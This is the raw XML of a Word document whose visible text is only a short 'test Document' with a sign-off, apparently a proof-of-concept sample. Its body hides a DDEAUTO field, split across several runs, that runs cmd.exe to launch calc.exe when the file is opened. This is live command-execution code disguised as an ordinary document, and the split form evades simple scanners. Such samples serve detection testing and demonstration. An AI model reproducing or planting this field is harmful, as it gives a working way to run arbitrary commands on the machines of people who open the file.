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04C5B" w14:textId="758F6E26" w:rsidR="00147DCB" w:rsidRDefault="00147DCB">
      <w:r>
        <w:t>This is a test Document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311FA44C" w14:textId="6BF96565" w:rsidR="00065BE8" w:rsidRDefault="00065BE8" w:rsidP="00065BE8"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  <w:r w:rsidRPr="00065BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Sample text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D7ED8" w14:textId="25EEB9B3" w:rsidR="00147DCB" w:rsidRDefault="00147DCB"/>
    <w:p w14:paraId="3A36EF9E" w14:textId="2EFBFC9F" w:rsidR="0092760D" w:rsidRDefault="009F07DB">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009F07DB">
        <w:instrText>DDE</w:instrText>
      </w:r>
      <w:r w:rsidR="00ED0D69">
        <w:instrText>AUTO</w:instrText>
      </w:r>
      <w:r w:rsidRPr="009F07DB">
        <w:instrText xml:space="preserve"> c:\\windows\\system32\\cmd.exe "/</w:instrText>
      </w:r>
      <w:r w:rsidR="009D1622">
        <w:instrText xml:space="preserve">K </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009F07DB">
        <w:instrText xml:space="preserve">calc.exe" </w:instrText>
      </w:r>
      <w:r w:rsidR="005344CD">
        <w:instrText xml:space="preserve"> \* MERGEFROMAT</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w: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</w:p>
    <w:p w14:paraId="5A238474" w14:textId="1F9D4530" w:rsidR="007740EA" w:rsidRDefault="007740EA"/>
    <w:p w14:paraId="6F73FD41" w14:textId="36B90891" w:rsidR="007740EA" w:rsidRDefault="007740EA">
      <w:r>
        <w:t>Regards,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A685B" w14:textId="5FA6AED3" w:rsidR="007740EA" w:rsidRDefault="007740EA">
      <w:r>
        <w:t>Someone</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0077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0D"/>
    <w:rsid w:val="00065BE8"/>
    <w:rsid w:val="00147DCB"/>
    <w:rsid w:val="005344CD"/>
    <w:rsid w:val="007740EA"/>
    <w:rsid w:val="0092760D"/>
    <w:rsid w:val="00941BB9"/>
    <w:rsid w:val="009D1622"/>
    <w:rsid w:val="009F07DB"/>
    <w:rsid w:val="00ED0D69"/>
    <w:rsid w:val="00F2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F913"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{84DB6A3E-62AD-4F6A-9907-545F7A7B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Batchu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Srinivas Batchu</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-06T05:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-06T06:19:00Z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2021-01-06T05:49:18Z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a330359a-0279-48d4-a9d1-c6931ac2071e</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_a0819fa7-4367-4500-ba88-dd630d977609_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>